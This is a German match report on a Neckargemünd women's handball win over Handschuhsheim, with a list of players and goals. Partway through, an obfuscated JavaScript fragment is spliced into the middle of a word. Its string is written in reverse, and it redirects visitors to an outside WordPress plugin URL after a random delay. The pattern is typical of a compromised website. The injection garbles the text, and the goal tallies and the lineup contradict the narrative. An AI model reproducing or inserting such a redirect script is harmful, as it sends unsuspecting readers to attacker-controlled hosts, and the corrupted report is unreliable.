Nach dem letzten Spiel war für alle klar: es musste sich sowohl im Angriff als auch in der Abwehr etwas ändern, um gegen Handschuhsheim zwei Punkte mit nach Hause zu nehmen. Doch es würde ein schwieriger Weg werden, denn mit der bereits schwach besetzten Bank, kam noch ein Spontanausfall von Sandra Pabst dazu. Mit ihr fehlte eine erfahrende Spielerin auf dem Feld.
Neckargemünd, 16.11.13 (cko) – Die ersten paar Minuten gestalteten sich ein bisschen schwierig, aber mit den ersten beiden Toren wurde die erste Hürde schnell überwunden. Durch ein schnelles Spiel nach vorne wurden die Handschuhsheimerinnen von den Damen aus Neckargemünd förmlich überlaufen, wodurch viele einfache Tore gelangen.
Auch das Abwehrverhalten der Neckargemünderinnen war ein ganz anderes als in der Woche davor. Vor allem Kathrin Knauf und Anna Runz hatten eine große Verantwortung im Mittelblock, der sie aber völlig gerecht geworden sind.
Im Angriff hatte zunächst Carolyn Gerstner das Sagen. Sie sorgte für eine gute Vertretung für die kranke Frau Päbstin. Spielzüge wurden angesagt und fanden endlich mal den Abschluss, der meist mit einem Tor belohnt wurde.
7:20
In der zweiten Halbzeit spielte man nicht so konzentriert weiter, wie in der Ersten. Technische Fehler sorgten dafür, dass der Spielfluss nicht zum Laufen kam und die Damen aus Handschuhsheim leichte Tore erzielten. Erst mit der Auszeit von Trainer Tomi hatte man sich wieder gefangen und man spielte wieder mit gewohntem Druck nach vorne. Vor allem Sina Illenberger hatte einen guten Drang zum Tor und erzielte dadurch 7 Treffer. Aber auch der restliche Rückraum war sehr toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torgefährlich, wodurch die Außenspielerinnen immer wieder freigespielt wurden und zum Torwurf kamen.
Im Großen und Ganzen war es eine gute Leistung von allen Spielerinnen, die mit einem Sieg von 20 : 32 belohnt wurde.
Am ersten Advent (01.12.2013) geht es für die Frauen aus Neckargemünd zum Tabellenführer nach Walldorf. Wir hoffen auf tatkräftige Unterstützung.
Es spielten:
Im Tor: Sina Mulawa und Kira Höfer
Im Feld: Charlotte Koch (15/3), Kathrin Knauf (4), Sina Illenberger (6), Anna Runz (2), Sandra Pabst, Jessica Lehr (1), Carolyn Gerstner (1), Sandra Drescher (3)